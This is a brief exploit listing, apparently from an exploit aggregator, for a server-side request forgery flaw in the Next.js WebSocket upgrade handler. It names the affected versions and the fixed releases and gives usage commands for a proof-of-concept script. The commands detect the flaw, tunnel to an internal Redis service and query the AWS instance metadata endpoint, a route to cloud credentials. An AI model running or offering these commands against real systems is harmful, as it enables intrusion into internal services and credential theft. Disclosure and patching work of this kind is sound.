Share
## https://sploitus.com/exploit?id=81295CB4-B089-54E0-B6FF-1FACB4C142ED
# CVE-2026-44578 - Next.js WebSocket SSRF PoC

**Vulnerability:** Server-Side Request Forgery in Next.js WebSocket upgrade handler (13.4.13 โ†’ 15.5.15, 16.0.0 โ†’ 16.1.6)

## Usage

```bash
# Detect vulnerability
python3 poc.py target.com:3000 --detect

# Tunnel to internal Redis
python3 poc.py target.com:3000 --internal 127.0.0.1:6379 --payload "INFO\r\n"

# Tunnel to AWS metadata
python3 poc.py target.com:3000 --internal 169.254.169.254:80 --payload "GET /latest/meta-data/ HTTP/1.0\r\n\r\n"
```

## Fix
Upgrade to Next.js 15.5.16 or 16.2.5

## References
- https://hadrian.io/blog/next-js-websocket-ssrf-unauthenticated-access-to-internal-resources-cve-2026-44578-2
- GHSA-c4j6-fc7j-m34r